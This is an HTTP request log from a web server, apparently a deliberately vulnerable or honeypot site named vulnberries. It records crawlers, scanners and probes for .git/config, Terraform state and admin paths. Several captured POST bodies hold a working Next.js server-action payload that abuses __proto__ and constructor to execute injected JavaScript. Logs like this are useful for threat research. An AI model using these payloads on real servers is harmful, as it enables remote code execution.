[2026-03-04 18:02:53] === HTTP Request ===
===================
Sec-Fetch-Dest: script
Sec-Ch-Ua-Platform: "macOS"
Priority: u=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Via: 2.0 Caddy
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Referer: https://admin.vulnberries.ru/
Sec-Ch-Ua-Mobile: ?0
Cookie: auth=sess_1772646490453422354; user_id=7
Accept: */*
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39706
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-04 18:02:53] === HTTP Request ===
===================
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
X-Forwarded-For: 45.85.105.206
Sec-Fetch-Dest: style
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/
Priority: u=0
Cookie: auth=sess_1772646490453422354; user_id=7
Via: 2.0 Caddy
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39686
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-04 18:02:53] === HTTP Request ===
[2026-03-04 18:02:53] Main page accessed - IP: 172.30.0.12:39686
===================
X-Forwarded-Proto: https
Via: 2.0 Caddy
Accept-Encoding: gzip, deflate, br, zstd
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 45.85.105.206
Sec-Fetch-User: ?1
Sec-Fetch-Site: none
Sec-Fetch-Dest: document
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Mode: navigate
Priority: u=0, i
Cookie: auth=sess_1772646490453422354; user_id=7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39686
Path: /
URL: /
Method: GET
[2026-03-04 18:02:53] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50027
Path: /.terraform.tfstate.lock.info
URL: /.terraform.tfstate.lock.info
Method: GET
[2026-03-04 18:02:36] === HTTP Request ===
===================
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.96:24224
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-04 17:16:00] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.105:43868
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-04 15:12:19] === HTTP Request ===
[2026-03-04 15:12:19] Main page accessed - IP: 85.142.100.105:43866
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.105:43866
Path: /
URL: /
Method: GET
[2026-03-04 15:12:19] === HTTP Request ===
[2026-03-04 14:14:12] Main page accessed - IP: 35.233.5.189:45494
===================
User-Agent: python-requests/2.32.5
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 35.233.5.189:45494
Path: /
URL: /
Method: GET
[2026-03-04 14:14:12] === HTTP Request ===
===================
------WebKitFormBoundaryx1769424697081--
------WebKitFormBoundaryx1769424697081
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1769424697081
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 334260+true+5293558;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1769424697081
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1769424697081
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Connection: close
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1769424697081
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:41358
Path: /api/route
URL: /api/route
Method: POST
[2026-03-04 13:52:22] === HTTP Request ===
===================
------WebKitFormBoundaryx1212169676114--
------WebKitFormBoundaryx1212169676114
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1212169676114
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 204089+true+5939417;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1212169676114
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1212169676114
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
X-Nextjs-Html-Request-Id: ilovepoop_1212169676114
Next-Action: x
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:41350
Path: /app
URL: /app
Method: POST
[2026-03-04 13:52:21] === HTTP Request ===
===================
------WebKitFormBoundaryx156301383052--
------WebKitFormBoundaryx156301383052
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx156301383052
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 210331+true+743121;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx156301383052
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_156301383052
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx156301383052
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:41340
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-04 13:52:21] === HTTP Request ===
===================
------WebKitFormBoundaryx31891247398--
------WebKitFormBoundaryx31891247398
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx31891247398
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 9593+true+3324429;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx31891247398
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_31891247398
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx31891247398
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Content-Length: 512
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:41326
Path: /api
URL: /api
Method: POST
[2026-03-04 13:52:20] === HTTP Request ===
===================
------WebKitFormBoundaryx247535310151--
------WebKitFormBoundaryx247535310151
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx247535310151
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 207495+true+1192970;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx247535310151
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_247535310151
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx247535310151
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:45936
Path: /_next
URL: /_next
Method: POST
[2026-03-04 13:52:17] === HTTP Request ===
[2026-03-04 13:52:13] Main page accessed - IP: 195.3.221.86:45926
===================
------WebKitFormBoundaryx485890099175--
------WebKitFormBoundaryx485890099175
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx485890099175
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 171242+true+2837447;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx485890099175
X-Nextjs-Html-Request-Id: ilovepoop_485890099175
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx485890099175
Next-Action: x
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:45926
Path: /
URL: /
Method: POST
[2026-03-04 13:52:13] === HTTP Request ===
[2026-03-04 13:52:13] Main page accessed - IP: 195.3.221.86:45924
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:45924
Path: /
URL: /
Method: GET
[2026-03-04 13:52:13] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 172.212.200.96:51222
Path: /manager/html
URL: /manager/html
Method: GET
[2026-03-04 13:11:03] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.112:54034
Path: /security.txt
URL: /security.txt
Method: GET
[2026-03-04 12:52:08] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.112:37604
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-04 12:52:04] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.153.112:37586
Path: *
URL: *
Method: PRI
[2026-03-04 12:52:04] === HTTP Request ===
[2026-03-04 12:52:03] Main page accessed - IP: 66.132.153.112:37540
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.112:37540
Path: /
URL: /
Method: GET
[2026-03-04 12:52:03] === HTTP Request ===
[2026-03-04 12:45:39] Logs page accessed - IP: 172.30.0.12:54016
===================
Sec-Fetch-Site: none
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Via: 2.0 Caddy
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Dest: document
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 134.209.47.109
Sec-Fetch-Mode: navigate
Accept-Language: en-US,en;q=0.9
Accept-Encoding: zstd,gzip,deflate,br, gzip, deflate, br, zstd
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:54016
Path: /logs
URL: /logs
Method: GET
[2026-03-04 12:45:39] === HTTP Request ===
[2026-03-04 12:30:36] Salary page accessed - IP: 172.30.0.12:52060
===================
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Mode: navigate
Accept-Encoding: zstd,gzip,deflate,br, gzip, deflate, br
X-Forwarded-For: 157.245.117.91
Sec-Fetch-Site: none
Sec-Fetch-Dest: document
Accept-Language: en-US,en;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:52060
Path: /salary
URL: /salary
Method: GET
[2026-03-04 12:30:36] === HTTP Request ===
[2026-03-04 12:28:01] Goods page accessed - IP: 172.30.0.12:35548
===================
Sec-Fetch-Mode: navigate
Accept-Language: en-US,en;q=0.9
X-Forwarded-For: 161.35.138.50
Via: 2.0 Caddy
Sec-Fetch-Site: none
Accept-Encoding: zstd,gzip,deflate,br, gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: document
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:35548
Path: /goods
URL: /goods
Method: GET
[2026-03-04 12:28:01] === HTTP Request ===
[2026-03-04 12:18:16] Main page accessed - IP: 172.30.0.12:59266
===================
Sec-Ch-Ua-Mobile: ?0
X-Forwarded-Proto: https
X-Forwarded-For: 143.198.25.121
Via: 2.0 Caddy
Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"
Sec-Ch-Ua-Platform: "macOS"
Accept-Encoding: zstd,gzip,deflate,br, gzip, deflate, br, zstd
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Accept-Language: en-US,en;q=0.9
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:59266
Path: /
URL: /
Method: GET
[2026-03-04 12:18:16] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +``https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.134:44276
Path: /admin/login.asp/
URL: /admin/login.asp/
Method: GET
[2026-03-04 12:01:26] === HTTP Request ===
[2026-03-04 11:56:20] Cabinet page accessed - user_id: , IP: 172.30.0.12:50974
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: none
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Accept-Language: en-US,en;q=0.9
X-Forwarded-Proto: https
X-Forwarded-For: 159.65.32.122
Via: 2.0 Caddy
Sec-Ch-Ua-Platform: "macOS"
Accept-Encoding: zstd,gzip,deflate,br, gzip, deflate, br, zstd
Sec-Fetch-Mode: navigate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50974
Path: /cabinet
URL: /cabinet
Method: GET
[2026-03-04 11:56:20] === HTTP Request ===
[2026-03-04 11:43:57] Defects page accessed - IP: 172.30.0.12:46744
===================
Accept-Encoding: zstd,gzip,deflate,br, gzip, deflate, br
X-Forwarded-For: 161.35.138.83
Via: 2.0 Caddy
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Accept-Language: en-US,en;q=0.9
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46744
Path: /defects
URL: /defects
Method: GET
[2026-03-04 11:43:57] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
X-Forwarded-Proto: https
X-Forwarded-For: 195.178.110.157
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36268
Path: /.git/config
URL: /.git/config
Method: GET
[2026-03-04 11:24:37] === HTTP Request ===
[2026-03-04 10:41:25] Main page accessed - IP: 89.110.97.157:43944
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.110.97.157:43944
Path: /
URL: /
Method: GET
[2026-03-04 10:41:25] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +``https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.137:44294
Path: /transmission/web/
URL: /transmission/web/
Method: GET
[2026-03-04 09:45:07] === HTTP Request ===
[2026-03-04 09:44:08] Main page accessed - IP: 176.65.149.45:43564
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:43564
Path: /
URL: /
Method: GET
[2026-03-04 09:44:08] === HTTP Request ===
[2026-03-04 09:20:24] Main page accessed - IP: 172.30.0.12:45912
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Accept: */*
X-Forwarded-For: 74.7.227.20
Via: 2.0 Caddy
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45912
Path: /
URL: /
Method: GET
[2026-03-04 09:20:24] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
From: oai-searchbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Via: 2.0 Caddy
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.175.185
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45912
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-04 09:20:22] === HTTP Request ===
[2026-03-04 08:52:15] Main page accessed - IP: 45.156.128.43:45930
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.128.43:45930
Path: /
URL: /
Method: GET
[2026-03-04 08:52:15] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 57.128.95.121:38312
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-04 08:34:45] === HTTP Request ===
[2026-03-04 08:34:45] Main page accessed - IP: 85.217.140.33:46322
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.33:46322
Path: /
URL: /
Method: GET
[2026-03-04 08:34:45] === HTTP Request ===
===================
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.96:57380
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-04 08:17:01] === HTTP Request ===
[2026-03-04 07:33:12] Main page accessed - IP: 176.65.149.45:38252
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:38252
Path: /
URL: /
Method: GET
[2026-03-04 07:33:12] === HTTP Request ===
===================
------WebKitFormBoundaryx40368291251--
------WebKitFormBoundaryx40368291251
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx40368291251
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 7490+true+5389625;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx40368291251
Connection: close
Content-Length: 512
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx40368291251
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
X-Nextjs-Html-Request-Id: ilovepoop_40368291251
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:60576
Path: /api/route
URL: /api/route
Method: POST
[2026-03-04 07:04:40] === HTTP Request ===
===================
------WebKitFormBoundaryx437817322260--
------WebKitFormBoundaryx437817322260
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx437817322260
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 257461+true+1700519;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx437817322260
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_437817322260
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx437817322260
Next-Action: x
X-Nextjs-Request-Id: poop1234
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:60562
Path: /app
URL: /app
Method: POST
[2026-03-04 07:04:37] === HTTP Request ===
===================
------WebKitFormBoundaryx462069309879--
------WebKitFormBoundaryx462069309879
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx462069309879
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 279889+true+1650902;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx462069309879
X-Nextjs-Html-Request-Id: ilovepoop_462069309879
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx462069309879
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 518
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:60520
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-04 07:04:37] === HTTP Request ===
===================
------WebKitFormBoundaryx508700227457--
------WebKitFormBoundaryx508700227457
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx508700227457
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 70888+true+7176112;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx508700227457
X-Nextjs-Html-Request-Id: ilovepoop_508700227457
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx508700227457
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Next-Action: x
